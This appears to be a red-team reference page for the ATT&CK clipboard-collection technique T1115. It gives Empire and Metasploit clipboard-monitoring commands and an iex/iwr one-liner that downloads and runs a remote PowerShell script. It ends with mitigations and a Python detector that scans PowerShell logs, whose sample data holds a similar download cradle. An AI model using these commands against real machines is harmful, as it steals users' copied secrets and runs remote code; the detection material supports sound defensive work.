Clipboard Data

https://attack.mitre.org/techniques/T1115/

ATT&CK ID: T1115

Permissions Required: User

Description

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

In Windows, applications can access clipboard data by using the Windows API.

Techniques

Empire

This module monitors the clipboard on a specified interval for changes to copied text.

usemodule powershell/collection/clipboard_monitor

Get-ClipboardContents

Get-ClipboardContents monitors for information currently in the clipboard and anything that may be copied to the clipboard for the duration of the script's execution time.

iex (iwr -usebasicparsing https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Get-ClipboardContents.ps1);Get-ClipboardContents

Metasploit

This Metasploit module can be loaded from the meterpreter shell.

load extapi

# Read the target's current clipboard (text, files, images)
clipboard_get_data

# Dump all captured clipboard content
clipboard_monitor_dump

# Pause the active clipboard monitor
clipboard_monitor_pause

# Delete all captured clipboard content without dumping it
clipboard_monitor_purge

# Resume the paused clipboard monitor
clipboard_monitor_resume

# Start the clipboard monitor
clipboard_monitor_start

# Stop the clipboard monitor
clipboard_monitor_stop

# Write text to the target's clipboard
clipboard_set_text

PowerShell

The native PowerShell command Get-Clipboard retrieves information that is currently stored in the clipboard.

Get-Clipboard

Mitigations

  • Monitor executed commands and arguments for actions that collect data stored in the clipboard from users copying information within or between applications.

  • Monitor for API calls that could collect data stored in the clipboard from users copying information within or between applications.
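
One way to apply the command-monitoring point above to PowerShell Script Block Logging (event ID 4104) records. This is an added example, not code from the original page or from any of the tools it lists. The record field names, the sample events, the `gcb` alias and the .NET/Win32 indicator names are additions or assumptions made for the illustration.

```python
import re

# Clipboard-read indicators, matched against lowercased script-block text.
# Get-Clipboard and Get-ClipboardContents are named on this page; the gcb alias,
# the .NET Clipboard getters and Win32 GetClipboardData are additions.
INDICATORS = [
    ("Get-ClipboardContents", re.compile(r"(?<![\w$-])get-clipboardcontents(?![\w-])")),
    ("Get-Clipboard", re.compile(r"(?<![\w$-])(?:get-clipboard|gcb)(?![\w-])")),
    (".NET Clipboard read", re.compile(r"clipboard\]?::(?:gettext|getdataobject|getimage|getfiledroplist)\b")),
    ("Win32 GetClipboardData", re.compile(r"\bgetclipboarddata\b")),
]

def normalize(script):
    """Undo cheap obfuscation: backtick escapes and 'a'+'b' string splitting."""
    script = script.replace("`", "")
    script = re.sub(r"""['"]\s*\+\s*['"]""", "", script)
    return script.lower()

def scan(events):
    """Return (host, user, [indicator names]) for each 4104 event that reads the clipboard."""
    hits = []
    for ev in events:
        if ev.get("event_id") != 4104:  # only script block logging records
            continue
        text = normalize(ev.get("script_block", ""))
        names = [name for name, rx in INDICATORS if rx.search(text)]
        if names:
            hits.append((ev["host"], ev["user"], names))
    return hits

# Constructed sample records (not real telemetry); field names are assumptions.
SAMPLE_EVENTS = [
    {"event_id": 4104, "host": "WS01", "user": "alice", "script_block": "Get-Clipboard | Out-File notes.txt"},
    {"event_id": 4104, "host": "WS02", "user": "bob", "script_block": "iex (iwr -usebasicparsing https://example.invalid/x.ps1);Get-ClipboardContents"},
    {"event_id": 4104, "host": "WS03", "user": "carol", "script_block": "& ('Get-Clip'+'board')"},
    {"event_id": 4104, "host": "WS03", "user": "carol", "script_block": "G`et-Clip`board"},
    {"event_id": 4104, "host": "WS04", "user": "dave", "script_block": "[System.Windows.Forms.Clipboard]::GetText()"},
    {"event_id": 4104, "host": "WS05", "user": "erin", "script_block": "Set-Clipboard -Value 'build ok'"},
    {"event_id": 4103, "host": "WS06", "user": "frank", "script_block": "Get-Clipboard"},
]

if __name__ == "__main__":
    for host, user, names in scan(SAMPLE_EVENTS):
        print(f"{host}\t{user}\t{', '.join(names)}")
```

Get-Clipboard is also used legitimately in admin scripts, so hits are better treated as triage leads and correlated with the parent process and any download cradle in the same script block.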
